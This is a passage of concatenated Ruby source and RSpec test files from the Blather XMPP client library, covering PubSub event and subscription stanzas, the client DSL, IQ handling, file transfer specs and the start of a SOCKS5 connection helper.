# @return [XML::Node, nil]
def purge?
purge_node
end
# Get or create the actual event node
#
# @return [Blather::XMPPNode]
def event_node
node = find_first('//ns:event', :ns => self.class.registered_ns)
node = find_first('//event', self.class.registered_ns) unless node
unless node
(self << (node = XMPPNode.new('event', self.document)))
node.namespace = self.class.registered_ns
end
node
end
# Get or create the actual items node
#
# @return [Blather::XMPPNode]
def items_node
node = find_first('ns:event/ns:items', :ns => self.class.registered_ns)
unless node
(self.event_node << (node = XMPPNode.new('items', self.document)))
node.namespace = event_node.namespace
end
node
end
# Get the actual purge node
#
# @return [Blather::XMPPNode]
def purge_node
event_node.find_first('//ns:purge', :ns => self.class.registered_ns)
end
# Get the subscription IDs associated with this event
#
# @return [Array<String>]
def subscription_ids
find('//ns:header[@name="SubID"]', :ns => SHIM_NS).map do |n|
n.content
end
end
# Check if this is a subscription stanza
#
# @return [XML::Node, nil]
def subscription?
subscription_node
end
# Get the actual subscription node
#
# @return [Blather::XMPPNode]
def subscription_node
event_node.find_first('//ns:subscription', :ns => self.class.registered_ns)
end
alias_method :subscription, :subscription_node
end # Event
end # PubSub
end # Stanza
end # Blather
<file_sep>/lib/blather/client/dsl.rb
require File.join(File.dirname(__FILE__), 'client')
module Blather
# # Blather DSL
#
# The DSL is a set of methods that enables you to write cleaner code. Being a
# module means it can be included in or extend any class you may want to
# create.
#
# Every stanza handler is registered as a method on the DSL.
#
# @example Include the DSL in the top level namespace.
#
# require 'blather/client'
# when_ready { puts "Connected ! send messages to #{jid.stripped}." }
#
# subscription :request? do |s|
# write_to_stream s.approve!
# end
#
# message :chat?, :body => 'exit' do |m|
# say m.from, 'Exiting ...'
# shutdown
# end
#
# message :chat?, :body do |m|
# say m.from, "You sent: #{m.body}"
# end
#
# @example Set the DSL to its own namespace.
#
# require 'blather/client/dsl'
# module Echo
# extend Blather::DSL
#
# when_ready { puts "Connected ! send messages to #{jid.stripped}." }
#
# subscription :request? do |s|
# write_to_stream s.approve!
# end
#
# message :chat?, :body => 'exit' do |m|
# say m.from, 'Exiting ...'
# shutdown
# end
#
# message :chat?, :body do |m|
# say m.from, "You sent: #{m.body}"
# end
# end
#
# Echo.setup '<EMAIL>', 'foobar'
#
# EM.run { Echo.run }
#
# @example Create a class out of it
#
# require 'blather/client/dsl'
# class Echo
# include Blather::DSL
# end
#
# echo = Echo.new
# echo.setup '<EMAIL>', 'foobar'
# echo.when_ready { puts "Connected ! send messages to #{jid.stripped}." }
#
# echo.subscription :request? do |s|
# write_to_stream s.approve!
# end
#
# echo.message :chat?, :body => 'exit' do |m|
# say m.from, 'Exiting ...'
# shutdown
# end
#
# echo.message :chat?, :body do |m|
# say m.from, "You sent: #{m.body}"
# end
#
# EM.run { echo.run }
#
module DSL
autoload :PubSub, File.expand_path(File.join(File.dirname(__FILE__), *%w[dsl pubsub]))
def self.append_features(o)
# Generate a method for every stanza handler that exists.
Blather::Stanza.handler_list.each do |handler_name|
o.__send__ :define_method, handler_name do |*args, &callback|
handle handler_name, *args, &callback
end
end
super
end
def self.extended(o)
# Generate a method for every stanza handler that exists.
Blather::Stanza.handler_list.each do |handler_name|
module_eval <<-METHOD, __FILE__, __LINE__
def #{handler_name}(*args, &callback)
handle :#{handler_name}, *args, &callback
end
METHOD
end
super
end
# The actual client connection
#
# @return [Blather::Client]
def client
@client ||= Client.new
end
module_function :client
# A pubsub helper
#
# @return [Blather::PubSub]
def pubsub
@pubsub ||= PubSub.new client, jid.domain
end
# Push data to the stream
# This works such that it can be chained:
# self << stanza1 << stanza2 << "raw data"
#
# @param [#to_xml, #to_s] stanza data to send down the wire
# @return [self]
def <<(stanza)
client.write stanza
self
end
# Prepare server settings
#
# @param [#to_s] jid the JID to authenticate with
# @param [#to_s] password the password to authenticate with
# @param [String] host (optional) the host to connect to (can be an IP). If
# this is `nil` the domain on the JID will be used
# @param [Fixnum, String] (optional) port the port to connect on
# @param [Fixnum] (optional) connection_timeout the time to wait for connection to succeed before timing out
# @param [Hash] (optional) options
def setup(jid, password, host = nil, port = nil, certs = nil, connection_timeout = nil, options = {})
client.setup(jid, password, host, port, certs, connection_timeout, options)
end
# Connect to the server. Must be run in the EventMachine reactor
def run
client.run
end
# Shutdown the connection.
# Flushes the write buffer then stops EventMachine
def shutdown
client.close
end
# Setup a before filter
#
# @param [Symbol] handler (optional) the stanza handler the filter should
# run before
# @param [guards] guards (optional) a set of guards to check the stanza
# against
# @yield [Blather::Stanza] stanza
def before(handler = nil, *guards, &block)
client.register_filter :before, handler, *guards, &block
end
# Setup an after filter
#
# @param [Symbol] handler (optional) the stanza handler the filter should
# run after
# @param [guards] guards (optional) a set of guards to check the stanza
# against
# @yield [Blather::Stanza] stanza
def after(handler = nil, *guards, &block)
client.register_filter :after, handler, *guards, &block
end
# Set handler for a stanza type
#
# @param [Symbol] handler the stanza type it should handle
# @param [guards] guards (optional) a set of guards to check the stanza
# against
# @yield [Blather::Stanza] stanza
def handle(handler, *guards, &block)
client.register_handler handler, *guards, &block
end
# Wrapper for "handle :ready" (just a bit of syntactic sugar)
#
# This is run after the connection has been completely setup
def when_ready(&block)
handle :ready, &block
end
# Wrapper for "handle :disconnected"
#
# This is run after the connection has been shut down.
#
# @example Reconnect after a disconnection
# disconnected { client.run }
def disconnected(&block)
handle :disconnected, &block
end
# Set current status
#
# @param [Blather::Stanza::Presence::State::VALID_STATES] state the current
# state
# @param [#to_s] msg the status message to use
def set_status(state = nil, msg = nil)
client.status = state, msg
end
# Direct access to the roster
#
# @return [Blather::Roster]
def my_roster
client.roster
end
# Write data to the stream
#
# @param [#to_xml, #to_s] stanza the data to send down the wire.
def write_to_stream(stanza)
client.write stanza
end
# Helper method to join a MUC room
#
# @overload join(room_jid, nickname)
# @param [Blather::JID, #to_s] room the JID of the room to join
# @param [#to_s] nickname the nickname to join the room as
# @overload join(room_jid, nickname)
# @param [#to_s] room the name of the room to join
# @param [Blather::JID, #to_s] service the service domain the room is hosted at
# @param [#to_s] nickname the nickname to join the room as
def join(room, service, nickname = nil)
join = Blather::Stanza::Presence::MUC.new
join.to = if nickname
"#{room}@#{service}/#{nickname}"
else
"#{room}/#{service}"
end
client.write join
end
# Helper method to make sending basic messages easier
#
# @param [Blather::JID, #to_s] to the JID of the message recipient
# @param [#to_s] msg the message to send
# @param [#to_sym] the stanza method to use
def say(to, msg, using = :chat)
client.write Blather::Stanza::Message.new(to, msg, using)
end
# The JID according to the server
#
# @return [Blather::JID]
def jid
client.jid
end
# Halt the handler chain
#
# Use this to stop the propogation of the stanza though the handler chain.
#
# @example Ignore all IQ stanzas
#
# before(:iq) { halt }
def halt
throw :halt
end
# Pass responsibility to the next handler
#
# Use this to jump out of the current handler and let the next registered
# handler take care of the stanza
#
# @example Pass a message to the next handler
#
# This is contrive and should be handled with guards, but pass a message
# to the next handler based on the content
#
# message { |s| puts "message caught" }
# message { |s| pass if s.body =~ /pass along/ }
def pass
throw :pass
end
# Request items or info from an entity
# discover (items|info), [jid], [node] do |response|
# end
def discover(what, who, where, &callback)
stanza = Blather::Stanza.class_from_registration(:query, "http://jabber.org/protocol/disco##{what}").new
stanza.to = who
stanza.node = where
client.register_tmp_handler stanza.id, &callback
client.write stanza
end
# Set the capabilities of the client
#
# @param [String] node the URI
# @param [Array<Hash>] identities an array of identities
# @param [Array<Hash>] features an array of features
def set_caps(node, identities, features)
client.caps.node = node
client.caps.identities = identities
client.caps.features = features
end
# Send capabilities to the server
def send_caps
client.register_handler :disco_info, :type => :get, :node => client.caps.node do |s|
r = client.caps.dup
r.to = s.from
r.id = s.id
client.write r
end
client.write client.caps.c
end
end # DSL
end # Blather
<file_sep>/lib/blather/stanza/iq.rb
module Blather
class Stanza
# # Iq Stanza
#
# [RFC 3920 Section 9.2.3 - IQ Semantics](http://xmpp.org/rfcs/rfc3920.html#rfc.section.9.2.3)
#
# Info/Query, or IQ, is a request-response mechanism, similar in some ways
# to HTTP. The semantics of IQ enable an entity to make a request of, and
# receive a response from, another entity. The data content of the request
# and response is defined by the namespace declaration of a direct child
# element of the IQ element, and the interaction is tracked by the
# requesting entity through use of the 'id' attribute. Thus, IQ interactions
# follow a common pattern of structured data exchange such as get/result or
# set/result (although an error may be returned in reply to a request if
# appropriate).
#
# ## "ID" Attribute
#
# Iq Stanzas require the ID attribute be set. Blather will handle this
# automatically when a new Iq is created.
#
# ## "Type" Attribute
#
# * `:get` -- The stanza is a request for information or requirements.
#
# * `:set` -- The stanza provides required data, sets new values, or
# replaces existing values.
#
# * `:result` -- The stanza is a response to a successful get or set request.
#
# * `:error` -- An error has occurred regarding processing or delivery of a
# previously-sent get or set (see Stanza Errors).
#
# Blather provides a helper for each possible type:
#
# Iq#get?
# Iq#set?
# Iq#result?
# Iq#error?
#
# Blather treats the `type` attribute like a normal ruby object attribute
# providing a getter and setter. The default `type` is `get`.
#
# iq = Iq.new
# iq.type # => :get
# iq.get? # => true
# iq.type = :set
# iq.set? # => true
# iq.get? # => false
#
# iq.type = :invalid # => RuntimeError
#
# @handler :iq
class Iq < Stanza
# @private
VALID_TYPES = [:get, :set, :result, :error].freeze
register :iq
# @private
def self.import(node)
klass = nil
node.children.detect do |e|
ns = e.namespace ? e.namespace.href : nil
klass = class_from_registration(e.element_name, ns)
end
if klass && klass != self
klass.import(node)
else
new(node[:type]).inherit(node)
end
end
# Create a new Iq
#
# @param [Symbol, nil] type the type of stanza (:get, :set, :result, :error)
# @param [Blather::JID, String, nil] jid the JID of the inteded recipient
# @param [#to_s] id the stanza's ID. Leaving this nil will set the ID to
# the next unique number
def self.new(type = nil, to = nil, id = nil)
node = super :iq
node.type = type || :get
node.to = to
node.id = id || self.next_id
node
end
# Check if the IQ is of type :get
#
# @return [true, false]
def get?
self.type == :get
end
# Check if the IQ is of type :set
#
# @return [true, false]
def set?
self.type == :set
end
# Check if the IQ is of type :result
#
# @return [true, false]
def result?
self.type == :result
end
# Check if the IQ is of type :error
#
# @return [true, false]
def error?
self.type == :error
end
# Ensures type is :get, :set, :result or :error
#
# @param [#to_sym] type the Iq type. Must be one of VALID_TYPES
def type=(type)
if type && !VALID_TYPES.include?(type.to_sym)
raise ArgumentError, "Invalid Type (#{type}), use: #{VALID_TYPES*' '}"
end
super
end
# Overrides the parent method to ensure the reply is of type :result and that
# all children are removed.
#
# @param [Hash] opts options to pass to reply!
# @option opts [Boolean] :remove_children Wether or not to remove child nodes when replying
#
# @return [self]
def reply!(opts = {})
opts = {:remove_children => true}.merge opts
super
self.type = :result
self
end
end
end
end
<file_sep>/lib/blather/stanza/presence/subscription.rb
module Blather
class Stanza
class Presence
# # Subscription Stanza
#
# [RFC 3921 Section 8 - Integration of Roster Items and Presence Subscriptions](http://xmpp.org/rfcs/rfc3921.html#rfc.section.8)
#
# Blather handles subscription request/response through this class. It
# provides a set of helper methods to quickly transform the stanza into a
# response.
#
# @handler :subscription
class Subscription < Presence
register :subscription, :subscription
# Create a new Subscription stanza
#
# @param [Blather::JID, #to_s] to the JID to subscribe to
# @param [Symbol, nil] type the subscription type
def self.new(to = nil, type = nil)
node = super()
node.to = to
node.type = type
node
end
module InstanceMethods
# Set the to value on the stanza
#
# @param [Blather::JID, #to_s] to a JID to subscribe to
def to=(to)
super JID.new(to).stripped
end
# Transform the stanza into an approve stanza
# makes approving requests simple
#
# @example approve an incoming request
# subscription(:request?) { |s| write_to_stream s.approve! }
# @return [self]
def approve!
self.type = :subscribed
reply_if_needed!
end
# Transform the stanza into a refuse stanza
# makes refusing requests simple
#
# @example refuse an incoming request
# subscription(:request?) { |s| write_to_stream s.refuse! }
# @return [self]
def refuse!
self.type = :unsubscribed
reply_if_needed!
end
# Transform the stanza into an unsubscribe stanza
# makes unsubscribing simple
#
# @return [self]
def unsubscribe!
self.type = :unsubscribe
reply_if_needed!
end
# Transform the stanza into a cancel stanza
# makes canceling simple
#
# @return [self]
def cancel!
self.type = :unsubscribed
reply_if_needed!
end
# Transform the stanza into a request stanza
# makes requests simple
#
# @return [self]
def request!
self.type = :subscribe
reply_if_needed!
end
# Check if the stanza is a request
#
# @return [true, false]
def request?
self.type == :subscribe
end
end
include InstanceMethods
end #Subscription
end #Presence
end #Stanza
end
<file_sep>/spec/support/mock_server.rb
class MockServer; end
module ServerMock
def receive_data(data)
@server ||= MockServer.new
@server.receive_data data, self
end
end
<file_sep>/lib/blather/stanza/pubsub/subscribe.rb
module Blather
class Stanza
class PubSub
# # PubSub Subscribe Stanza
#
# [XEP-0060 Section 6.1 - Subscribe to a Node](http://xmpp.org/extensions/xep-0060.html#subscriber-subscribe)
#
# @handler :pubsub_subscribe
class Subscribe < PubSub
register :pubsub_subscribe, :subscribe, self.registered_ns
# Create a new subscription node
#
# @param [Blather::Stanza::Iq::VALID_TYPES] type the IQ stanza type
# @param [String] host the host name to send the request to
# @param [String] node the node to subscribe to
# @param [Blather::JID, #to_s] jid see {#jid=}
def self.new(type = :set, host = nil, node = nil, jid = nil)
new_node = super(type, host)
new_node.node = node
new_node.jid = jid
new_node
end
# Get the JID of the entity to subscribe
#
# @return [Blather::JID]
def jid
JID.new(subscribe[:jid])
end
# Set the JID of the entity to subscribe
#
# @param [Blather::JID, #to_s] jid
def jid=(jid)
subscribe[:jid] = jid
end
# Get the name of the node to subscribe to
#
# @return [String]
def node
subscribe[:node]
end
# Set the name of the node to subscribe to
#
# @param [String] node
def node=(node)
subscribe[:node] = node
end
# Get or create the actual subscribe node on the stanza
#
# @return [Blather::XMPPNode]
def subscribe
unless subscribe = pubsub.find_first('ns:subscribe', :ns => self.class.registered_ns)
self.pubsub << (subscribe = XMPPNode.new('subscribe', self.document))
subscribe.namespace = self.pubsub.namespace
end
subscribe
end
end # Subscribe
end # PubSub
end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/pubsub/affiliations.rb
module Blather
class Stanza
class PubSub
# # PubSub Affiliations Stanza
#
# [XEP-0060 Section 8.9 - Manage Affiliations](http://xmpp.org/extensions/xep-0060.html#owner-affiliations)
#
# @handler :pubsub_affiliations
class Affiliations < PubSub
register :pubsub_affiliations, :affiliations, self.registered_ns
include Enumerable
alias_method :find, :xpath
# Overrides the parent to ensure an affiliation node is created
# @private
def self.new(type = nil, host = nil)
new_node = super
new_node.affiliations
new_node
end
# Kill the affiliations node before running inherit
# @private
def inherit(node)
affiliations.remove
super
end
# Get or create the affiliations node
#
# @return [Blather::XMPPNode]
def affiliations
aff = pubsub.find_first('ns:affiliations', :ns => self.class.registered_ns)
unless aff
self.pubsub << (aff = XMPPNode.new('affiliations', self.document))
end
aff
end
# Convenience method for iterating over the list
#
# @see #list for the format of the yielded input
def each(&block)
list.each &block
end
# Get the number of affiliations
#
# @return [Fixnum]
def size
list.size
end
# Get the hash of affilations as affiliation-type => [nodes]
#
# @example
#
# { :owner => ['node1', 'node2'],
# :publisher => ['node3'],
# :outcast => ['node4'],
# :member => ['node5'],
# :none => ['node6'] }
#
# @return [Hash<String => Array<String>>]
def list
items = affiliations.find('//ns:affiliation', :ns => self.class.registered_ns)
items.inject({}) do |hash, item|
hash[item[:affiliation].to_sym] ||= []
hash[item[:affiliation].to_sym] << item[:node]
hash
end
end
end # Affiliations
end # PubSub
end # Stanza
end # Blather
<file_sep>/spec/blather/file_transfer_spec.rb
require 'spec_helper'
require 'blather/client/dsl'
module MockFileReceiver
def post_init
end
def receive_data(data)
end
def unbind
end
def send(data, params)
end
end
def si_xml
<<-XML
<iq type='set' id='offer1' to='<EMAIL>/balcony' from='<EMAIL>/orchard'>
<si xmlns='http://jabber.org/protocol/si'
id='a0'
mime-type='text/plain'
profile='http://jabber.org/protocol/si/profile/file-transfer'>
<file xmlns='http://jabber.org/protocol/si/profile/file-transfer'
name='test.txt'
size='1022'>
<range/>
</file>
<feature xmlns='http://jabber.org/protocol/feature-neg'>
<x xmlns='jabber:x:data' type='form'>
<field var='stream-method' type='list-single'>
<option><value>http://jabber.org/protocol/bytestreams</value></option>
<option><value>http://jabber.org/protocol/ibb</value></option>
</field>
</x>
</feature>
</si>
</iq>
XML
end
describe Blather::FileTransfer do
before do
@host = 'host.name'
@client = Blather::Client.setup Blather::JID.new('n@d/r'), 'pass'
end
it 'can select ibb' do
iq = Blather::XMPPNode.parse(si_xml)
@client.stubs(:write).with do |answer|
expect(answer.si.feature.x.field('stream-method').value).to eq(Blather::Stanza::Iq::Ibb::NS_IBB)
true
end
transfer = Blather::FileTransfer.new(@client, iq)
transfer.allow_s5b = false
transfer.allow_ibb = true
transfer.accept(MockFileReceiver)
end
it 'can select s5b' do
iq = Blather::XMPPNode.parse(si_xml)
@client.stubs(:write).with do |answer|
expect(answer.si.feature.x.field('stream-method').value).to eq(Blather::Stanza::Iq::S5b::NS_S5B)
true
end
transfer = Blather::FileTransfer.new(@client, iq)
transfer.allow_s5b = true
transfer.allow_ibb = false
transfer.accept(MockFileReceiver)
end
it 'can allow s5b private ips' do
iq = Blather::XMPPNode.parse(si_xml)
@client.stubs(:write).with do |answer|
expect(answer.si.feature.x.field('stream-method').value).to eq(Blather::Stanza::Iq::S5b::NS_S5B)
true
end
transfer = Blather::FileTransfer.new(@client, iq)
transfer.allow_s5b = true
transfer.allow_private_ips = true
transfer.allow_ibb = false
transfer.accept(MockFileReceiver)
end
it 'can response no-valid-streams' do
iq = Blather::XMPPNode.parse(si_xml)
@client.stubs(:write).with do |answer|
expect(answer.find_first('error')['type']).to eq("cancel")
expect(answer.find_first('.//ns:no-valid-streams', :ns => 'http://jabber.org/protocol/si')).not_to be_nil
true
end
transfer = Blather::FileTransfer.new(@client, iq)
transfer.allow_s5b = false
transfer.allow_ibb = false
transfer.accept(MockFileReceiver)
end
it 'can decline transfer' do
iq = Blather::XMPPNode.parse(si_xml)
@client.stubs(:write).with do |answer|
expect(answer.find_first('error')['type']).to eq("cancel")
expect(answer.find_first('.//ns:forbidden', :ns => 'urn:ietf:params:xml:ns:xmpp-stanzas')).not_to be_nil
expect(answer.find_first('.//ns:text', :ns => 'urn:ietf:params:xml:ns:xmpp-stanzas').content).to eq("Offer declined")
true
end
transfer = Blather::FileTransfer.new(@client, iq)
transfer.decline
end
it 'can s5b post_init include the handler' do
class TestS5B < Blather::FileTransfer::S5b::SocketConnection
def initialize()
super("0.0.0.0", 1, MockFileReceiver, nil)
restore_methods
self.post_init()
end
def self.new(*args)
allocate.instance_eval do
initialize(*args)
self
end
end
end
expect { TestS5B.new }.not_to raise_error
end
end
<file_sep>/lib/blather/stanza/pubsub_owner.rb
module Blather
class Stanza
# # PubSubOwner Base Class
#
# [XEP-0060 - Publish-Subscribe](http://xmpp.org/extensions/xep-0060.html)
#
# @handler :pubsub_owner
class PubSubOwner < Iq
register :pubsub_owner, :pubsub, 'http://jabber.org/protocol/pubsub#owner'
# Creates the proper class from the stana's child
# @private
def self.import(node)
klass = nil
if pubsub = node.document.find_first('//ns:pubsub', :ns => self.registered_ns)
pubsub.children.each { |e| break if klass = class_from_registration(e.element_name, (e.namespace.href if e.namespace)) }
end
(klass || self).new(node[:type]).inherit(node)
end
# Overrides the parent to ensure a pubsub node is created
# @private
def self.new(type = nil, host = nil)
new_node = super type
new_node.to = host
new_node.pubsub
new_node
end
# Overrides the parent to ensure the pubsub node is destroyed
# @private
def inherit(node)
remove_children :pubsub
super
end
# Get or create the pubsub node on the stanza
#
# @return [Blather::XMPPNode]
def pubsub
unless p = find_first('ns:pubsub', :ns => self.class.registered_ns)
self << (p = XMPPNode.new('pubsub', self.document))
p.namespace = self.class.registered_ns
end
p
end
end # PubSubOwner
end # Stanza
end # Blather
<file_sep>/lib/blather/stanza/pubsub/subscription.rb
module Blather
class Stanza
class PubSub
# # PubSub Subscription Stanza
#
# [XEP-0060 Section 8.8 Manage Subscriptions](http://xmpp.org/extensions/xep-0060.html#owner-subscriptions)
#
# @handler :pubsub_subscription
class Subscription < PubSub
# @private
VALID_TYPES = [:none, :pending, :subscribed, :unconfigured]
register :pubsub_subscription, :subscription, self.registered_ns
# Create a new subscription request node
#
# @param [Blather::Stanza::Iq::VALID_TYPES] type the IQ type
# @param [String] host the host to send the request to
# @param [String] node the node to look for requests on
# @param [Blather::JID, #to_s] jid the JID of the subscriber
# @param [String] subid the subscription ID
# @param [VALID_TYPES] subscription the subscription type
def self.new(type = :result, host = nil, node = nil, jid = nil, subid = nil, subscription = nil)
new_node = super(type, host)
new_node.node = node
new_node.jid = jid
new_node.subid = subid
new_node.subscription = subscription
new_node
end
# Check if the type is none
#
# @return [Boolean]
def none?
self.subscription == :none
end
# Check if the type is pending
#
# @return [Boolean]
def pending?
self.subscription == :pending
end
# Check if the type is subscribed
#
# @return [Boolean]
def subscribed?
self.subscription == :subscribed
end
# Check if the type is unconfigured
#
# @return [Boolean]
def unconfigured?
self.subscription == :unconfigured
end
# Get the JID of the subscriber
#
# @return [Blather::JID]
def jid
JID.new(subscription_node[:jid])
end
# Set the JID of the subscriber
#
# @param [Blather::JID, #to_s] jid
def jid=(jid)
subscription_node[:jid] = jid
end
# Get the name of the subscription node
#
# @return [String]
def node
subscription_node[:node]
end
# Set the name of the subscription node
#
# @param [String] node
def node=(node)
subscription_node[:node] = node
end
# Get the ID of the subscription
#
# @return [String]
def subid
subscription_node[:subid]
end
# Set the ID of the subscription
#
# @param [String] subid
def subid=(subid)
subscription_node[:subid] = subid
end
# Get the subscription type
#
# @return [VALID_TYPES, nil]
def subscription
s = subscription_node[:subscription]
s.to_sym if s
end
# Set the subscription type
#
# @param [VALID_TYPES, nil] subscription
def subscription=(subscription)
if subscription && !VALID_TYPES.include?(subscription.to_sym)
raise ArgumentError, "Invalid Type (#{type}), use: #{VALID_TYPES*' '}"
end
subscription_node[:subscription] = subscription
end
# Get or create the actual subscription node
#
# @return [Blather::XMPPNode]
def subscription_node
unless subscription = pubsub.find_first('ns:subscription', :ns => self.class.registered_ns)
self.pubsub << (subscription = XMPPNode.new('subscription', self.document))
subscription.namespace = self.pubsub.namespace
end
subscription
end
end # Subscribe
end # PubSub
end # Stanza
end # Blather
<file_sep>/spec/blather/stanza/iq/ping_spec.rb
require 'spec_helper'
def ping_xml
<<-XML
<iq from='capulet.lit' to='<EMAIL>/balcony' id='s2c1' type='get'>
<ping xmlns='urn:xmpp:ping'/>
</iq>
XML
end
describe Blather::Stanza::Iq::Ping do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:ping, 'urn:xmpp:ping')).to eq(Blather::Stanza::Iq::Ping)
end
it 'can be imported' do
node = Blather::XMPPNode.parse ping_xml
expect(node).to be_instance_of Blather::Stanza::Iq::Ping
end
it 'ensures a ping node is present on create' do
iq = Blather::Stanza::Iq::Ping.new
expect(iq.xpath('ns:ping', :ns => 'urn:xmpp:ping')).not_to be_empty
end
it 'ensures a ping node exists when calling #ping' do
iq = Blather::Stanza::Iq::Ping.new
iq.ping.remove
expect(iq.xpath('ns:ping', :ns => 'urn:xmpp:ping')).to be_empty
expect(iq.ping).not_to be_nil
expect(iq.xpath('ns:ping', :ns => 'urn:xmpp:ping')).not_to be_empty
end
it 'responds with an empty IQ' do
ping = Blather::Stanza::Iq::Ping.new :get, '<EMAIL>', '<PASSWORD>'
ping.from = '<EMAIL>'
expected_pong = Blather::Stanza::Iq::Ping.new(:result, '<EMAIL>', 'abc123').tap do |pong|
pong.from = '<EMAIL>'
end
reply = ping.reply
expect(reply).to eq(expected_pong)
expect(reply.children.count).to eq(0)
end
end
<file_sep>/lib/blather/stream/features/session.rb
module Blather
class Stream
# @private
class Session < Features
SESSION_NS = 'urn:ietf:params:xml:ns:xmpp-session'.freeze
register SESSION_NS
def initialize(stream, succeed, fail)
super
@to = @stream.jid.domain
end
def receive_data(stanza)
@node = stanza
case stanza.element_name
when 'session' then session
when 'iq' then check_response
else fail!(UnknownResponse.new(stanza))
end
end
private
def check_response
if @node[:type] == 'result'
succeed!
else
fail!(StanzaError.import(@node))
end
end
##
# Send a start session command
def session
response = Stanza::Iq.new :set
response.to = @to
response << (sess = XMPPNode.new('session', response.document))
sess.namespace = SESSION_NS
@stream.send response
end
end
end
end
<file_sep>/spec/blather/stanza/pubsub/create_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSub::Create do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:create, 'http://jabber.org/protocol/pubsub')).to eq(Blather::Stanza::PubSub::Create)
end
it 'can be imported' do
expect(Blather::XMPPNode.parse(<<-NODE)).to be_instance_of Blather::Stanza::PubSub::Create
<iq type='set'
from='<EMAIL>/elsinore'
to='pubsub.shakespeare.lit'
id='create1'>
<pubsub xmlns='http://jabber.org/protocol/pubsub'>
<create node='princely_musings'/>
<configure/>
</pubsub>
</iq>
NODE
end
it 'ensures a create node is present on create' do
create = Blather::Stanza::PubSub::Create.new
expect(create.find('//ns:pubsub/ns:create', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'ensures a configure node is present on create' do
create = Blather::Stanza::PubSub::Create.new
expect(create.find('//ns:pubsub/ns:configure', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'ensures a create node exists when calling #create_node' do
create = Blather::Stanza::PubSub::Create.new
create.pubsub.remove_children :create
expect(create.find('//ns:pubsub/ns:create', :ns => Blather::Stanza::PubSub.registered_ns)).to be_empty
expect(create.create_node).not_to be_nil
expect(create.find('//ns:pubsub/ns:create', :ns => Blather::Stanza::PubSub.registered_ns)).not_to be_empty
end
it 'defaults to a set node' do
create = Blather::Stanza::PubSub::Create.new
expect(create.type).to eq(:set)
end
it 'sets the host if requested' do
create = Blather::Stanza::PubSub::Create.new :set, 'pubsub.jabber.local'
expect(create.to).to eq(Blather::JID.new('pubsub.jabber.local'))
end
it 'sets the node' do
create = Blather::Stanza::PubSub::Create.new :set, 'host', 'node-name'
expect(create.node).to eq('node-name')
end
end
<file_sep>/spec/blather/stanza/pubsub/event_spec.rb
require 'spec_helper'
require 'fixtures/pubsub'
describe Blather::Stanza::PubSub::Event do
it 'registers itself' do
expect(Blather::XMPPNode.class_from_registration(:event, 'http://jabber.org/protocol/pubsub#event')).to eq(Blather::Stanza::PubSub::Event)
end
it 'is importable' do
expect(Blather::XMPPNode.parse(event_notification_xml)).to be_instance_of Blather::Stanza::PubSub::Event
end
it 'ensures a query node is present on create' do
evt = Blather::Stanza::PubSub::Event.new
expect(evt.find('ns:event', :ns => Blather::Stanza::PubSub::Event.registered_ns)).not_to be_empty
end
it 'ensures an event node exists when calling #event_node' do
evt = Blather::Stanza::PubSub::Event.new
evt.remove_children :event
expect(evt.find('*[local-name()="event"]')).to be_empty
expect(evt.event_node).not_to be_nil
expect(evt.find('ns:event', :ns => Blather::Stanza::PubSub::Event.registered_ns)).not_to be_empty
end
it 'ensures an items node exists when calling #items_node' do
evt = Blather::Stanza::PubSub::Event.new
evt.remove_children :items
expect(evt.find('*[local-name()="items"]')).to be_empty
expect(evt.items_node).not_to be_nil
expect(evt.find('ns:event/ns:items', :ns => Blather::Stanza::PubSub::Event.registered_ns)).not_to be_empty
end
it 'knows the associated node name' do
evt = Blather::XMPPNode.parse(event_with_payload_xml)
expect(evt.node).to eq('princely_musings')
end
it 'ensures newly inherited items are PubSubItem objects' do
evt = Blather::XMPPNode.parse(event_with_payload_xml)
expect(evt.items?).to eq(true)
expect(evt.retractions?).to eq(false)
expect(evt.items.map { |i| i.class }.uniq).to eq([Blather::Stanza::PubSub::PubSubItem])
end
it 'will iterate over each item' do
evt = Blather::XMPPNode.parse(event_with_payload_xml)
evt.items.each { |i| expect(i.class).to eq(Blather::Stanza::PubSub::PubSubItem) }
end
it 'handles receiving subscription ids' do
evt = Blather::XMPPNode.parse(event_subids_xml)
expect(evt.subscription_ids).to eq(['123-abc', '004-yyy'])
end
it 'can have a list of retractions' do
evt = Blather::XMPPNode.parse(<<-NODE)
<message from='pubsub.shakespeare.lit' to='<EMAIL>' id='foo'>
<event xmlns='http://jabber.org/protocol/pubsub#event'>
<items node='princely_musings'>
<retract id='ae890ac52d0df67ed7cfdf51b644e901'/>
</items>
</event>
</message>
NODE
expect(evt.retractions?).to eq(true)
expect(evt.items?).to eq(false)
expect(evt.retractions).to eq(%w[ae890ac52d0df67ed7cfdf51b644e901])
end
it 'can be a purge' do
evt = Blather::XMPPNode.parse(<<-NODE)
<message from='pubsub.shakespeare.lit' to='<EMAIL>' id='foo'>
<event xmlns='http://jabber.org/protocol/pubsub#event'>
<purge node='princely_musings'/>
</event>
</message>
NODE
expect(evt.purge?).not_to be_nil
expect(evt.node).to eq('princely_musings')
end
it 'can be a subscription notification' do
evt = Blather::XMPPNode.parse(<<-NODE)
<message from='pubsub.shakespeare.lit' to='<EMAIL>' id='foo'>
<event xmlns='http://jabber.org/protocol/pubsub#event'>
<subscription jid='<EMAIL>' subscription='subscribed' node='/example.com/test'/>
</event>
</message>
NODE
expect(evt.subscription?).not_to be_nil
expect(evt.subscription[:jid]).to eq('<EMAIL>')
expect(evt.subscription[:subscription]).to eq('subscribed')
expect(evt.subscription[:node]).to eq('/example.com/test')
end
end
<file_sep>/lib/blather/stanza/presence/muc.rb
module Blather
class Stanza
class Presence
class MUC < Status
register :muc_join, :x, "http://jabber.org/protocol/muc"
def self.new(*args)
new_node = super
new_node.muc
new_node
end
module InstanceMethods
def inherit(node)
muc.remove
super
self
end
def muc
unless muc = find_first('ns:x', :ns => MUC.registered_ns)
self << (muc = XMPPNode.new('x', self.document))
muc.namespace = self.class.registered_ns
end
muc
end
end
include InstanceMethods
end # MUC
end # Presence
end # Stanza
end # Blather
<file_sep>/lib/blather/core_ext/eventmachine.rb
# @private
module EventMachine
# @private
module Protocols
# Basic SOCKS v5 client implementation
#
# Use as you would any regular connection:
#
# class MyConn < EM::P::Socks5
# def post_init
# send_data("sup")
# end
#
